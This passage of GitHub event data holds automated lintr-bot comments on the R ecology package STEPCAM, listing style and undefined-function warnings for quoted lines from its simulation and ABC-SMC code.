1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n"}},"created_at":"2016-09-20T19:14:33Z"}
{"id":"4591834419","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19102327,"position":null,"line":null,"path":null,"commit_id":"171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba","created_at":"2016-09-20T19:14:49Z","updated_at":"2016-09-20T19:14:49Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L79) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:82:6:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:83:7:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L88) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:13:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:17:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:21:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:26:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:16:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L114) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:7:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:118:10:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:23:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:118:29:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:139:5:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L140) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L140) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:12:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:30:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L152) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:166:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L166) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:170:40:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                       ^\n```\n[R/ABC_SMC.R:170:53:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                   ~^~\n```\n[R/ABC_SMC.R:170:59:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                          ^\n```\n[R/ABC_SMC.R:170:68:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                                  ~^~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:174:8:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L174) *style:* **Commented code should be removed.**\n```r\n​     # source(\"/Users/janzen/GitHub/STEPCAM/R/modified_dbFD.R\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:1:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L175) *style:* **lines should not be more than 80 characters.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L175) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:82:](https://github.com/thijsjanzen/STEPCAM/blob/171d3f7ba2fb6ef70660d82964ca6c5d83ff07ba/R/ABC_SMC.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                                                                                 